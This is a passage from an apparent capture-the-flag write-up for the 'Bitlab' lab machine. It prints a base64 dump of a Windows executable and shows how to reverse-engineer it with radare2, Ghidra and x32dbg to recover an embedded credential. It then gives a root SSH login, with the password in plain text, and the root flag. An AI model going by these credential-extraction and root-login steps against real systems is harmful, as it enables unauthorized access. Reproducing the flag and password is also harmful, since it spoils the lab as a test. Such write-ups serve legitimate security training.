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COwAAzjsAANg7AADqOwAAADwAABo8AAAuPAAAZDwAAHY8AAAiOwAAGjsAAAw7AAACOwAA5DoAANQ6AADKOgAAwDoAALY6AACUOgAAdDoAAFg6AAA4OgAAmDsAAOw9AAACPgAAOjsAAAw+AAAAAAAAKjgAAAAAAABlAUdldFVzZXJOYW1lVwAAQURWQVBJMzIuZGxsAAAiAVNoZWxsRXhlY3V0ZVcAU0hFTEwzMi5kbGwApwI/Y291dEBzdGRAQDNWPyRiYXNpY19vc3RyZWFtQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQDFAQQAAjgI/X1hvdXRfb2ZfcmFuZ2VAc3RkQEBZQVhQQkRAWgCMAj9fWGxlbmd0aF9lcnJvckBzdGRAQFlBWFBCREBaAA0GP3VuY2F1Z2h0X2V4Y2VwdGlvbkBzdGRAQFlBX05YWgDIBT9zcHV0bkA/JGJhc2ljX3N0cmVhbWJ1ZkBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEBzdGRAQFFBRV9KUEJEX0pAWgAAUwI/X09zZnhAPyRiYXNpY19vc3RyZWFtQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBAUUFFWFhaAADFBT9zcHV0Y0A/JGJhc2ljX3N0cmVhbWJ1ZkBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEBzdGRAQFFBRUhEQFoAkQM/Zmx1c2hAPyRiYXNpY19vc3RyZWFtQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBAUUFFQUFWMTJAWFoAnAU/c2V0c3RhdGVAPyRiYXNpY19pb3NARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEBRQUVYSF9OQFoAAE1TVkNQMTAwLmRsbAAADQE/d2hhdEBleGNlcHRpb25Ac3RkQEBVQkVQQkRYWgBdAD8/MWV4Y2VwdGlvbkBzdGRAQFVBRUBYWgAAIgA/PzBleGNlcHRpb25Ac3RkQEBRQUVAQUJRQkRAWgAkAD8/MGV4Y2VwdGlvbkBzdGRAQFFBRUBBQlYwMUBAWgAA0QVtZW1tb3ZlAM0FbWVtY2hyAACiBWlzYWxudW0AZQA/PzNAWUFYUEFYQFoAAGMAPz8yQFlBUEFYSUBaAABNU1ZDUjEwMC5kbGwAAI0EX3VubG9jawBbAV9fZGxsb25leGl0ACMDX2xvY2sAyQNfb25leGl0AMUBX2Ftc2dfZXhpdAAAYwFfX2dldG1haW5hcmdzANwBX2NleGl0AAAqAl9leGl0AC0BX1hjcHRGaWx0ZXIAcwVleGl0AABkAV9faW5pdGVudgCwAl9pbml0dGVybQCxAl9pbml0dGVybV9lAOwBX2NvbmZpZ3RocmVhZGxvY2FsZQCiAV9fc2V0dXNlcm1hdGhlcnIAAOsBX2NvbW1vZGUAAEUCX2Ztb2RlAACfAV9fc2V0X2FwcF90eXBlAAD7AV9jcnRfZGVidWdnZXJfaG9vawAAIQJfZXhjZXB0X2hhbmRsZXI0X2NvbW1vbgACAT90ZXJtaW5hdGVAQFlBWFhaAO4AP190eXBlX2luZm9fZHRvcl9pbnRlcm5hbF9tZXRob2RAdHlwZV9pbmZvQEBRQUVYWFoAALgCX2ludm9rZV93YXRzb24AAO8BX2NvbnRyb2xmcF9zAADqAEVuY29kZVBvaW50ZXIAygBEZWNvZGVQb2ludGVyAOwCSW50ZXJsb2NrZWRFeGNoYW5nZQCyBFNsZWVwAOkCSW50ZXJsb2NrZWRDb21wYXJlRXhjaGFuZ2UAANMCSGVhcFNldEluZm9ybWF0aW9uAADABFRlcm1pbmF0ZVByb2Nlc3MAAMABR2V0Q3VycmVudFByb2Nlc3MA0wRVbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIAAKUEU2V0VW5oYW5kbGVkRXhjZXB0aW9uRmlsdGVyAAADSXNEZWJ1Z2dlclByZXNlbnQApwNRdWVyeVBlcmZvcm1hbmNlQ291bnRlcgCTAkdldFRpY2tDb3VudAAAxQFHZXRDdXJyZW50VGhyZWFkSWQAAMEBR2V0Q3VycmVudFByb2Nlc3NJZAB5AkdldFN5c3RlbVRpbWVBc0ZpbGVUaW1lAEtFUk5FTDMyLmRsbAAAOgFfX0N4eEZyYW1lSGFuZGxlcjMAAM8FbWVtY3B5AAAhAV9DeHhUaHJvd0V4Y2VwdGlvbgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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" | base64 -d > RemoteConnection.exe

If you use md5sum in both files, and the result is the same (same hash), is the same .exe file and you did the process well.

Now from our local terminal, we will analyze the executable.

Local Terminal

# This is to check, what files reads and if is dangerous or not
strings RemoteConnection.exe

Local Terminal

# write 'aaaa' and then 'afl', same goal as before
radare2 RemoteConnection.exe

To continue the scanning of the executable file, we are going to use GHidra

Here, the best option to analyze the file, is seeing every function inside the folder F.

Here there is something about Putty.exe, a ssh remote connection software. And something about "ipParameters," is probably that the credentials are here. To extract it we are going to use a debugger like x32dbg.

- x32dbg: Load the file

- x32dbg: Right Click > Search for > All Modules > String References

- x32dbg: Search for "Clave", because of what we found at the code. And double click at the remoteconnection row.

- x32dbg: Press F2 in the row 00C01647 to stop the executable file until that point.

Local Terminal

ssh root@10.129.11.47  # Qf7]8YSV.wDNF*[7d?j&eD4^

Target Terminal [Root]

root@bitlab:~# cat /root/root.txt
cfc2d02e761b8e33b17da0e571d3ceb3

PreviousAragog NextCanape

Last updated 2 years ago

hashtagGathering Information

hashtagPrivileges Escalation

Gathering Information

Privileges Escalation